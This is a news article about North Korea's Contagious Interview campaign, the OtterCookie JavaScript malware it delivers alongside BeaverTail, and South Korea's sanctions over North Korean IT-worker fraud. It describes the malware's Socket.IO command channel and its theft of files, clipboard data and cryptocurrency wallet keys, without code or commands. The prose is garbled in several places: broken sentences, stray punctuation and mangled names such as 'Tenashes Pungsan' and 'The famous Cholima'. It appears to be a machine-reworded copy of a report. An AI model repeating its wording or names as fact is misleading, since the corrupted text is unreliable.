The North Korean threat actors behind the ongoing Contagious Interview campaign have been spotted releasing a new JavaScript malware called OtterCookie.
Contagious interview (aka Deceptive development) refers to an ongoing attack campaign that uses social engineering lures, with a hacking team often posing as recruiters to trick potential job seekers into downloading malware under the guise of an interview process.
This involves spreading malware programs for video conferencing or Packages npm either hosted on GitHub or in the official package registry, opening the way for malware such as BeaverTail and InvisibleFerret to be deployed.
Palo Alto Networks Unit 42, which is the first exposed activities in November 2023. tracks the cluster under the alias CL-STA-0240. It is also called Famous Chollima and Tenashes Pungsan.
In September 2024 Singaporean cyber security company Group-IB documented the first major overhaul of the attack chain, which highlights the use of an updated version of BeaverTail that takes a modular approach, bringing its information-stealing functionality to a set of Python scripts that are collectively tracked as CivetQ.
At this stage it should be noted that Contagious Interview is rated as different from Operation Dream Job.another long-running North Korean hacking campaign that also uses similar work-related lures to trigger the malware infection process.
The latest findings of the Japanese cyber security company NTT Security Holdings to reveal that the JavaScript malware responsible for launching BeaverTail is also designed to receive and execute OtterCookie. The new malware is said to have been introduced in September 2024, and a new version was discovered in the wild last month.
Once started, OtterCookie communicates with the control server (C2) using the Socket.IO JavaScript library and waits for further instructions. It is designed to execute shell commands that facilitate data theft, including files, clipboard contents, and cryptocurrency wallet keys.
An older variant of OtterCookie spotted in September is functionally similar, but has a slight implementation difference in which the cryptocurrency wallet key-stealing functionality is directly embedded in the malware, as opposed to a remote shell command.
This event is a sign that threat actors are actively updating their tools, leaving the infection chain largely intact, which continues to demonstrate the effectiveness of the campaign.
South Korea sanctions 15 North Koreans for IT worker fraud
It also comes as South Korea’s Ministry of Foreign Affairs (MoFA) sanctioned 15 people and one organization in connection with a fraudulent IT worker scheme organized by its North counterpart to illegally obtain a stable source of income that can be sent back to North Korea, data theft and even demand ransom in some cases.
There is evidence assume that The famous Cholima the threat cluster is also behind the insider threat operation. It is also called by various names such as Nickel Tapestry, UNC5267 and Wagemole.
One of the 15 individuals targeted by the sanctions, Kim Ryu Son, was also accused by the US Department of Justice (DoJ) earlier this month for his alleged involvement in a long-term conspiracy to violate sanctions and commit fraud, money laundering and identity theft by illegally soliciting work from US companies and non-profit organizations.
The Foreign Ministry also sanctioned Chosun Geumjeong, an economic information technology sharing company accused of sending large numbers of IT personnel to China, Russia, Southeast Asia and Africa to raise funds for the regime by providing freelance or full-time jobs. in western companies.
These IT workers are said to be part of the 313th Main Bureau, an organization under Department of Munitions Industry Workers’ Party of Korea.
“The 313th General Bureau (…) sends many North Korean IT personnel abroad and uses the foreign currency earned to fund nuclear and missile development, and is involved in the development of software for military sector,” the ministry said. .
“North Korea’s illegal cyber activities are not only criminal acts that threaten the security of the cyber ecosystem, but also pose a serious threat to international peace and security as they are used as a means to develop North Korea’s nuclear and missile weapons.”
